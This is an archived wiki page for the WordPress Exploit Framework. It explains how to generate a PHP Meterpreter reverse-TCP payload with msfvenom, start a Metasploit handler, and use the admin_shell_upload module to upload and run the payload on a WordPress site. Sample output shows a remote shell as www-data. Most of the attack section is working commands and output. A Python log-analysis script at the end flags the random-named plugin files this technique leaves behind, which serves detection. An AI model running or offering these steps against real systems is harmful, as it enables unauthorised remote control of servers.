This repository has been archived by the owner on Oct 22, 2020. It is now read-only.

Establishing a Meterpreter Session Using a Custom Payload

Rob edited this page May 6, 2018 · 3 revisions

New Meterpreter Payloads in v1.6.1

As of WPXF v1.6.1, this process (with the exception of setting up the handler in Metasploit) can be automated by using the meterpreter_reverse_tcp or meterpreter_bind_tcp payloads instead. Both payloads expose the same basic options that would otherwise be passed to msfvenom.

If you wish to use msfvenom manually, then continue reading.

Creating the Meterpreter payload

The first step is to create the payload that we'll use with the exploit. To do this, we'll use msfvenom, which ships with Metasploit. In this example, we're going to use the php/meterpreter/reverse_tcp payload.

Run the following command, replacing the address specified with the address of the host machine you intend to run the reverse TCP handler on:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.213 -o meterpreter.php

This will generate and save the payload into a file called meterpreter.php in the current working directory.

Starting the handler in Metasploit

Metasploit contains a module, exploit/multi/handler, which starts a handler without running an exploit against any particular target. Start the handler by entering the following commands at an msf shell:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.213
LHOST => 192.168.1.213
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.213:4444 
[*] Starting the payload handler...

Note that the LHOST option set here matches the LHOST value passed to msfvenom, and the handler listens on the default port 4444, as the output confirms. Once the handler is running, we're ready to switch to WPXF to exploit the target.

Using WPXF to establish the Meterpreter session

For this example, we'll use the generic admin_shell_upload module. Load it with use exploit/shell/admin_shell_upload and set its options to point at the target host.

Once all the required options have been set, load the custom payload and set the payload_path option to point at the meterpreter.php file we generated earlier using msfvenom:

wpxf [exploit/shell/admin_shell_upload] > set payload custom

  [+] Loaded payload: #<Wpxf::Payloads::Custom:0x456e490>

wpxf [exploit/shell/admin_shell_upload] > set payload_path D:\meterpreter.php

  [+] Set payload_path => D:\meterpreter.php

wpxf [exploit/shell/admin_shell_upload] >

Execute the module with the run command. WPXF uploads and executes the payload, and the session is established in Metasploit:

WPXF output:

[-] Authenticating with WordPress using root:toor...
[-] Uploading payload...
[-] Executing the payload at
    http://192.168.1.15/wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php...
[+] Execution finished successfully 

Metasploit output:

[*] Sending stage (33068 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.213:4444 -> 192.168.1.15:38899) at 2016-01-18 17:36:46 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)
meterpreter >
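The WPXF output above shows the trace this technique leaves on the target: a PHP file executed from a freshly created wp-content/plugins directory with a random-looking name. The following Python script is an added detection example, not part of WPXF or Metasploit; it runs a simple check over constructed access-log lines, and the plugin allowlist, the upload-endpoint marker and the log lines themselves are assumptions.

```python
import re
# Constructed Apache-style access-log lines (not from the page) showing the trail that
# the walkthrough above leaves on the target: a login, a plugin upload, then a direct
# request to a PHP file in a brand-new plugin directory with a random-looking name.
SAMPLE_LOG = """\
192.168.1.213 - - [18/Jan/2016:17:36:40 -0500] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.1.213 - - [18/Jan/2016:17:36:44 -0500] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120
192.168.1.213 - - [18/Jan/2016:17:36:46 -0500] "GET /wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php HTTP/1.1" 200 0
10.0.0.7 - - [18/Jan/2016:17:40:01 -0500] "GET /wordpress/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 512
10.0.0.8 - - [18/Jan/2016:17:41:09 -0500] "GET /wordpress/wp-content/plugins/akismet/_inc/akismet.css HTTP/1.1" 200 2048
"""

# Hypothetical allowlist of plugin directories the site operator knows are installed.
KNOWN_PLUGINS = {"akismet", "hello"}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
PLUGIN_PHP_RE = re.compile(r'/wp-content/plugins/(?P<dir>[^/]+)/(?P<file>[^/?]+)\.php(?:\?|$)')
UPLOAD_MARKER = "action=upload-plugin"  # WordPress plugin-upload form target (assumed)


def looks_random(name: str) -> bool:
    """Heuristic for generated names like imWNCKWQaH: one run of mixed-case letters."""
    return bool(re.fullmatch(r"[A-Za-z]{8,16}", name)) and not name.islower() and not name.isupper()


def find_suspicious_plugin_hits(log_text: str, known=KNOWN_PLUGINS):
    """Return hits on PHP files under wp-content/plugins/ that fall outside the allowlist."""
    uploaders = set()   # addresses that POSTed a plugin upload earlier in the log
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and UPLOAD_MARKER in m["path"]:
            uploaders.add(m["ip"])
            continue
        p = PLUGIN_PHP_RE.search(m["path"])
        if not p or p["dir"] in known:
            continue
        reasons = ["PHP executed from a plugin directory not in the allowlist"]
        if looks_random(p["dir"]) and looks_random(p["file"]):
            reasons.append("random-looking directory and file name")
        if m["ip"] in uploaders:
            reasons.append("same address uploaded a plugin earlier")
        findings.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for hit in find_suspicious_plugin_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']}: {'; '.join(hit['reasons'])}")
```

Legitimate plugin traffic (akismet in the sample) is ignored because its directory is on the allowlist; the single flagged hit is the random-named PHP file, with the earlier plugin upload from the same address noted as corroboration.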